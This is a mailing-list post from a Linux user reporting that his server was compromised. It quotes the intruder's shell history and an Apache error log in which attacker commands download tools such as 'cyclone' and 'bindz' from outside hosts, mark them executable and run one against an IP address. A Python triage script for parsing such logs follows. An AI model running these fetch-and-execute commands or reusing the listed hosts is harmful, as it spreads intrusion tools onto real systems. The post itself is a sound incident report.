[Linux-bruxelles] hack (it's not over)
Alain BarBason
alain at barbason.be
Wed 7 Sep 22:31:39 CEST 2005
Alain BarBason wrote:
> Hello,
>
> My server got hacked, for the second time in +/- 4 years; well, I'm
> not exactly fierce about protection.
And here is the follow-up.
Tonight I found bindz, bindz.1 ... in /tmp
as well as a .bash_history
> host ccc.ma
> id
> host 207.44.197.233
> host 64.82.25.188
> ping -c 3 www.securityhack.net
> id*
> id
> rm -rf bindz
> ping
> cd /tmp;wget http://go0gler.com/cyclone;chmod 777 cyclone
> chmod 777 cyclone
> ./cyclone 72.22.64.102 80
and an error.log from /var/log/apache2
in case it rings a bell for anyone?
(for now, I have uninstalled/reinstalled my Apache server, we'll see
tomorrow :-)
> sh: line 1: cd: /var/tmp: No such file or directory
> --21:55:41-- http://mudmusicinc.com/xss/bindz
> => `bindz'
> Resolving mudmusicinc.com... 216.127.90.26
> Connecting to mudmusicinc.com[216.127.90.26]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 19,429 [text/plain]
> bindz: Permission denied
>
> Cannot write to `bindz' (Permission denied).
> chmod: cannot access `bindz': No such file or directory
> sh: line 1: cd: /var/tmp: No such file or directory
> --21:55:43-- http://mudmusicinc.com/xss/bindz
> => `bindz'
> Resolving mudmusicinc.com... 216.127.90.26
> Connecting to mudmusicinc.com[216.127.90.26]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 19,429 [text/plain]
> bindz: Permission denied
>
> Cannot write to `bindz' (Permission denied).
> chmod: cannot access `bindz': No such file or directory
> sh: line 1: cd: /var/tmp: No such file or directory
> --21:55:44-- http://mudmusicinc.com/xss/bindz
> => `bindz'
> Resolving mudmusicinc.com... 216.127.90.26
> Connecting to mudmusicinc.com[216.127.90.26]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 19,429 [text/plain]
> bindz: Permission denied
>
> Cannot write to `bindz' (Permission denied).
> chmod: cannot access `bindz': No such file or directory
> --21:55:46-- http://mudmusicinc.com/xss/bindz
> => `bindz'
> Resolving mudmusicinc.com... 216.127.90.26
> Connecting to mudmusicinc.com[216.127.90.26]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 19,429 [text/plain]
>
> 0K .......... ........ 100% 52.18 KB/s
>
> 21:55:47 (52.18 KB/s) - `bindz' saved [19429/19429]
>
> --21:55:48-- http://mudmusicinc.com/xss/bindz
> => `bindz.1'
> Resolving mudmusicinc.com... 216.127.90.26
> Connecting to mudmusicinc.com[216.127.90.26]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 19,429 [text/plain]
>
> 0K .......... ........ 100% 52.15 KB/s
>
> 21:55:49 (52.15 KB/s) - `bindz.1' saved [19429/19429]
>
> --21:55:50-- http://mudmusicinc.com/xss/bindz
> => `bindz.2'
> Resolving mudmusicinc.com... 216.127.90.26
> Connecting to mudmusicinc.com[216.127.90.26]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 19,429 [text/plain]
>
> 0K .......... ........ 100% 52.06 KB/s
>
> 21:55:51 (52.06 KB/s) - `bindz.2' saved [19429/19429]
>
--
by AlainBB
http://www.barbason.be
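
A triage sketch for the error.log quoted in this message, added here as an example and not part of the original post: wget transcripts inside an Apache error log indicate that a process started by the web server ran wget, and this Python script lists each transfer with its time, URL, target file and whether the write succeeded. The function names `wget_transfers` and `saved_files` are this example's own, and the sample is a shortened excerpt of the log above.

```python
import re

# Shortened excerpt of the error.log quoted in the message (mail quote markers removed).
SAMPLE = """\
sh: line 1: cd: /var/tmp: No such file or directory
--21:55:41-- http://mudmusicinc.com/xss/bindz
=> `bindz'
Length: 19,429 [text/plain]
bindz: Permission denied

Cannot write to `bindz' (Permission denied).
chmod: cannot access `bindz': No such file or directory
--21:55:46-- http://mudmusicinc.com/xss/bindz
=> `bindz'
Length: 19,429 [text/plain]

21:55:47 (52.18 KB/s) - `bindz' saved [19429/19429]
"""

START = re.compile(r"^--(\d\d:\d\d:\d\d)--\s+(\S+)")      # wget request banner
DEST = re.compile(r"^\s*=> `([^']+)'")                     # local file name
DENIED = re.compile(r"^Cannot write to `[^']+'")           # download failed
SAVED = re.compile(r"`[^']+' saved \[(\d+)/\d+\]")         # download completed


def wget_transfers(lines):
    """Return one record per wget transcript found in the log lines."""
    found, cur = [], None
    for line in lines:
        if m := START.match(line):
            cur = {"time": m[1], "url": m[2], "dest": None, "outcome": "unknown"}
            found.append(cur)
        elif cur is None:
            continue          # ordinary log line before any wget banner
        elif m := DEST.match(line):
            cur["dest"] = m[1]
        elif DENIED.match(line):
            cur["outcome"] = "write-denied"
        elif m := SAVED.search(line):
            cur["outcome"], cur["bytes"] = "saved", int(m[1])
    return found


def saved_files(records):
    """Names of files that were actually written, i.e. what to look for on disk."""
    return sorted({r["dest"] for r in records if r["outcome"] == "saved"})


if __name__ == "__main__":
    for rec in wget_transfers(SAMPLE.splitlines()):
        print(rec)
```
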